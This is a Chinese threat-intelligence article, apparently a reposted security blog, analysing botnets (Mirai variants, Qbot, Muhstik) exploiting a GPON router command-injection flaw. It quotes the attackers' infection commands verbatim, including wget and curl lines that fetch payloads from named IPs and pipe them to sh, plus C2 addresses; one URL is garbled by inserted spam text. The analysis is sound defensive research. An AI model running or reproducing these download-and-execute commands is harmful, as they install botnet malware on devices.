如何进行GPON Home Gateway远程命令执行漏洞分析

这篇文章将为大家详细讲解有关如何进行GPON Home Gateway远程命令执行漏洞分析，文章内容质量较高，因此小编分享给大家做个参考，希望大家阅读完这篇文章后对相关知识有一定的了解。2018/04/30，vpnMentor 公布了GPON路由器的高危漏洞：验证绕过漏洞 (CVE-2018-10561) 和命令注入漏洞 (CVE-2018-10562)。由于只需要发送一个请求，就可以在GPON 路由器上执行任意命令，所以在上一篇文章《GPON Home Gateway 远程命令执行漏洞分析》，我们给出了僵尸网络的相关预警。结合 ZoomEye 网络空间搜索引擎以及对漏洞原理的详细研究，我们对 GPON Home Gateway 远程命令执行漏洞被利用情况进行了深入的研究，意外地发现利用该漏洞的僵尸网络是可以被监控的。短短的四天时间内，这片路由器的战场，竞争、撤退、消亡时时刻刻都在上演，在每一个路由器的背后，每天都有着多个不同的恶意控制者，故事精彩得难以想象。漏洞发现者给出的利用脚本如下：该脚本逻辑如下：步骤 1(行 5)：将注入的命令发送至/GponForm/diag_Form 并被执行。步骤 2(行 9)：利用绕过漏洞访问 diag.html 页面获取命令执行的结果。关键点在第二步：当我们不使用 grep diag_result 去过滤返回的结果，将会发现部分路由器会将 diag_host 也一并返回。而参数 diag_host 就是步骤 1 中注入的命令。这就意味着，通过 ZoomEye 网络空间搜索引擎，我们可以监控互联网上相关路由器的 diag.html 页面，从而了解僵尸网络的活动情况。ZoomEye 网络空间搜索引擎在 2018/05/05、2018/05/07、2018/05/08 进行了三次探测，一共发现了与僵尸网络相关的命令12 处。1. Mirai 变种僵尸网络THANOS这是一个在我们研究前撤退、研究时重新归来的僵尸网络
使用的感染命令如下：
编号 1busybox wget http://104.243.44.250/mips -O /tmp/m
编号 10busybox wget http://82.202.166.101/mips -O -1.1 104.243.44.250 样本在我们发现相关攻击痕迹时，样本已无法下载。看起来就像始作俑者已经撤退。但是我们仍然从路由器上运行的样本中了解到该僵尸网络的行为： 当前进程
网络连接情况 CNC82.202.166.101:45,2018/05/05 未连接成功（2018/05/09 发现该 CNC 重新打开）由于该恶意样本拥有生成随机进程名、对外爆破 23 端口等特征，故可能是 Mirai 僵尸网络或其变种。1.2 82.202.166.101 样本2018/05/07，我们发现了少量该样本的感染痕迹，通过进一步研究，我们认为该僵尸网络已经回归。由于该样本直接在1.1 中的 CNC主机上传播，运行时依旧会生成随机进程名，对外爆破 23 端口，故我们将两者归为同一僵尸网络家族。新的 CNC185.232.65.169:8080新的CNC上线包如下根据这个上线包，我们将该僵尸网络称为Mirai 变种僵尸网络 THANOS2.Q bot 僵尸网络变种这是一个持续存在的僵尸网络，在我们三次探测中均有出现。预计感染了大量设备。
使用的感染命令如下：
编号 2busybox wget http://185.244.25.162/mips -O /tmp/.m
编号 7busybox wget http://58.215.144.205/mips -O /tmp/.q
编号 12busybox wget http://58.215.144.免费云主机域名205/mips -O /tmp/adj 2.1 185.244.25.162 样本该恶意样本属于 MIPS 架构，使用 UPX 加壳。在脱壳对其进行逆向的过程中，我们意外发现了与该样本相关的源码：https://darknetleaks.xyz/archive/botnetfiles/Qbot%20Sources/Hacker%20serverside&clientside/client.c但该样本和源码依然有很多地方不同：对外扫描的 IP 段不同，样本中对外扫描的 IP 段如下：该样本在对外扫描时，只会扫描表格中的这些 IPkill 别的 bot 的列表该样本会检测路由器中已有的进程，如果遇到下列可能属于其它僵尸网络的进程，将会进行kill操作 (匹配的关键词远比源码中的丰富)该样本的CNC为：185.33.145.92:252, 该CNC依旧处于活跃状态需要注意的是该样本内置了DDoS攻击模块，可以根据CNC指令发动TCP、UDP、HTTP 洪水攻击该样本内置了netcore backdoor 利用模块，并且可以通过 CNC 开启对外扫描（默认关闭，相关漏洞详情可以参考链接：http://blog.knownsec.com/2015/01/a-brief-analysis-of-netcore-netis-leak-emergency/）利用脚本如下：2.2 58.215.144.205 样本（2018/05/07 版本）该样本的感染逻辑没有太大变化，CNC与上文相同，为：185.33.145.92:252，所以我们认为这与上文同属于Q bot 僵尸网络家族的变种。2.3 58.215.144.205 样本（2018/05/08 版本）2018/05/08，58.215.144.205/mips 更新了相关的样本。通过逆向的结果看，新的样本与之前的逻辑完全不同，恶意控制者更换了控制的程序。新的样本看起来更像是Mirai僵尸网络的新变种，具体的感染细节我们仍在持续跟进中。该样本的 CNC 为linuxusaarm.com:4433.Muhstik僵尸网络2018/04/20，360netlab 曝光了一个长期存在的僵尸网络：Muhstik 僵尸网络。在本次漏洞事件中，我们也发现了大量Muhstik 僵尸网络的身影。该僵尸网络使用的感染命令如下：编号 3wget -qO – http://162.243.211.204/gpon|sh编号 4wget -qO – http://162.243.211.204/aio|sh编号 5wget -O /tmp/par http://162.243.211.204/mrt; chmod x /tmp/ping编号 8wget -qO – http://54.39.23.28/1sh | sh编号 9wget -qO – http://104.54.236.173/gpon | sh由于该僵尸网络样本众多，多条命令有多次重复感染。故我们通过下图展示各样本和各 IP 的联系：图中红点代表各 IP，灰点代表感染的 bash 脚本，黄点代表各恶意样本，蓝点代表出现的链接，红线代表从 bash 脚本中下载的样本各感染脚本如下：各样本 sha256 值如下:CNC192.99.71.250:90904. 未知样本 1该样本使用的感染命令如下：
编号 6curl -fsSL http://ztccds.freesfocss.com/test.txt | sh该样本会连接ztccds.freesfocss.com:23364, 样本具体功能仍在研究中。5. 未知样本 2该样本使用的感染命令如下：
编号 11busybox wget http://185.246.152.173/omni -O /tmp/talk
该样本运行的命令为/tmp/talk gpon该样本会连接 185.246.152.173:1000, 但该端口已经关闭 (2018/05/09)。注：由于仅探测了 diag.html 页面，故在多轮探测中我们只能确定哪些主机被攻击，无法判断攻击者是否攻击成功在对探测到的主机进行地域划分时，三轮探测中被攻击的 IP 都位于墨西哥。
对受影响最多的五个国家进行抽样测试，结果如下：该漏洞存在与墨西哥和哈萨克斯坦，但是由于固件不同，只有墨西哥的路由器会返回 diag_host，所以我们仅监测到墨西哥的路由器受影响情况。由于墨西哥的设备占据了全球设备的一半以上，我们认为相关数据依旧可以反应僵尸网络的实际情况。由于 2018/05/05 第一轮探测中只统计了存在/tmp 字段的 diag_host 的内容，所以第一轮探测的数据具有一定的局限性。可以很明显看出：确认被攻击的路由器数量在不断增加各僵尸网络活动频繁，2018/05/07 Muhstik 僵尸网络发动大量攻击，而 2018/05/08 就变成了 Q bot 僵尸网络变种。僵尸网络之间的竞争可见一斑。近年来，僵尸网络逐渐盯上攻击简单但危害巨大的物联网漏洞。从去年的 GoAhead 到今年的 GPON 事件，无不在提醒我们物联网安全的重要性。能结合 ZoomEye 网络空间搜索引擎了解到 GPON 事件背后活跃的僵尸网络动态，对我们来说就是一种收获。关于如何进行GPON Home Gateway远程命令执行漏洞分析就分享到这里了，希望以上内容可以对大家有一定的帮助，可以学到更多知识。如果觉得文章不错，可以把它分享出去让更多的人看到。

相关推荐: 5-华为防火墙：二层和三层接入的安全策略配置差异

一、实验拓扑：二、实验要求：1、内网：连接R2接口G0/0/2是三层接口，其它接口都是二层接口；R1、R2、R3部署默认路由到USG；2、USG上创建VLAN 10、202，并将G0/0/0划分到VLAN 202，G0/0/1划分到VLAN 10；3、部署Po…